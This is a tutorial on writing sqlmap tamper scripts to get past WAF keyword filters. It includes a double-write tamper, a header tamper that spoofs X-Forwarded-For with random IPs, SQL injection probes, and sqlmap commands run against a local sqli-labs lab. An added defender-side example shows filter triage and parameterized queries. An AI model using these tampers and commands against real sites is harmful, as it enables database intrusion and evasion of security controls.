Tamper scripts in brief
sqlmap's --tamper parameter introduces a user-defined script that modifies the payload during injection. It is used to bypass a WAF, replace filtered keywords, and so on. This is the basic structure of a tamper:
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW  # priority level at which this script is invoked


def dependencies():
    # Declares the scope (DBMS) this script does or does not apply to; may be empty.
    pass


def tamper(payload, **kwargs):
    # Main function for tampering with the payload and the request headers.
    return payload
Save it as my.py in the sqlmap/tamper directory, then add the parameter --tamper=my on the command line when running sqlmap.
Simple Analysis
Take one of the official tamper scripts to analyze the structure:
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import random
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def randomIP():
    numbers = []

    while not numbers or numbers[0] in (10, 172, 192):
        numbers = random.sample(xrange(1, 255), 4)

    return '.'.join(str(_) for _ in numbers)


def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()

    return payload
A tamper script consists of the __priority__ attribute, the dependencies function, the tamper function and user-defined imports.
import
In this section we can import sqlmap's internal libraries, which expose many functions and data types that sqlmap has already packaged for us, such as PRIORITY below, which comes from sqlmap/lib/core/enums.py.
PRIORITY
PRIORITY defines the priority of a tamper script and has the following values:
- LOWEST = -100
- LOWER = -50
- LOW = -10
- NORMAL = 0
- HIGH = 10
- HIGHER = 50
- HIGHEST = 100
If the user specifies several tamper scripts, sqlmap orders them according to the PRIORITY level defined in each script, preferring the higher level. If you need two tampers to work together, pay attention to this.
dependencies
dependencies is mainly used to tell the user which database(s) the tamper supports. The code is as follows:
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.NORMAL
def dependencies():
    singleTimeWarnMessage("这是我的tamper提示")


def tamper(payload, **kwargs):
    return payload
DBMS.MYSQL represents MySQL; the values for the other databases can also be looked up in sqlmap/lib/core/enums.py.
Tamper
The tamper function is the most important part of a tamper script: everything you want to achieve is written in this function. The payload parameter is the original injection payload generated by sqlmap; a bypass is usually implemented by modifying this payload. kwargs is used to modify the HTTP headers; if your bypass works by modifying HTTP headers, this is what you need.
Payload-based
First, bypassing keyword filtering by modifying the payload. I use the first level of sqli-labs and add some code that replaces malicious keywords with an empty string so that union-based queries are blocked.
Writing a tamper for the double-write bypass:
def tamper(payload, **kwargs):
    payload = payload.lower()
    payload = payload.replace('select', 'seleselectct')
    payload = payload.replace('union', 'ununionion')
    return payload
Before using the tamper, we add --tech=U so that sqlmap tests only union-query injection, and --flush-session so that the session is refreshed on every run, clearing the cache from the previous one.
sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --dbms=mysql
In the traffic seen in Burp, the payload contains no double-writing, so the injection is bound to fail. But after using the tamper:
sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --tamper=my --dbms=mysql
the payload is double-written as expected and the injection succeeds.
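The double-write works because the filter the author configured deletes each keyword exactly once, so removing the inner copy of "select" re-assembles the outer one. The following is an added example, not code from the post or from sqlmap, written from the defender's side: it reproduces that single-pass blacklist, shows how repeating it to a fixed point exposes nested keywords, and contrasts both with a parameterized query, where the same input is bound as data and no keyword matching is needed. The sample inputs are constructed and the SQLite table is a stand-in for the sqli-labs users table.

```python
import re
import sqlite3

# Keywords the sqli-labs-style filter blacklists (constructed, mirrors the tamper above).
KEYWORDS = ("union", "select")

# Constructed sample inputs; not captured from the post's run.
BENIGN = "42"
PLAIN_PROBE = "1' union select 1,2,3-- -"
DOUBLE_WRITTEN_PROBE = "1' ununionion seleselectct 1,2,3-- -"


def strip_once(value):
    """Single-pass blacklist filter: each keyword is deleted once, case-insensitively.
    'ununionion' becomes 'union' after the inner copy is removed."""
    for kw in KEYWORDS:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value


def strip_to_fixed_point(value, max_rounds=16):
    """Repeat the filter until the input stops changing. max_rounds bounds the work
    so that a long nested input cannot keep the filter busy."""
    for _ in range(max_rounds):
        stripped = strip_once(value)
        if stripped == value:
            return value
        value = stripped
    return value


def classify(value):
    """Defender-side triage of one parameter value:
    'clean'          - no blacklisted keyword present
    'keyword'        - a keyword is present and one pass removes it
    'nested-keyword' - one pass leaves a keyword behind, i.e. the filter itself
                       rebuilt it (the double-write pattern shown in the post)."""
    once = strip_once(value)
    if once == value:
        return "clean"
    if once == strip_to_fixed_point(value):
        return "keyword"
    return "nested-keyword"


def lookup_user_parameterised(user_id):
    """The actual fix: bind the value as a parameter. Whatever keywords it contains,
    it is compared as data against the id column and never parsed as SQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.execute("INSERT INTO users VALUES ('1', 'Dumb')")  # constructed row
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    for sample in (BENIGN, PLAIN_PROBE, DOUBLE_WRITTEN_PROBE):
        print(repr(sample), "->", classify(sample))
    print(lookup_user_parameterised("1"), lookup_user_parameterised(DOUBLE_WRITTEN_PROBE))
```

Note that the fixed-point filter only closes the gap for keywords it already knows about; the classification is useful as a WAF signal for logging and alerting, while the parameterized query is the control that removes the injection regardless of how the payload is spelled.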
HTTP-header-based
We use the sqlmap/tamper/xforwardedfor.py tamper to explain this:
def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """
    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload
It extracts the headers dictionary from kwargs and then modifies its values, so that the X-Forwarded-For header carries a random IP on every request. This is not repeated here.
Summary
This article briefly described how to write a tamper script, using double-writing as the demonstration example. In a real penetration test, we need to write different tampers for different WAFs and apply them flexibly.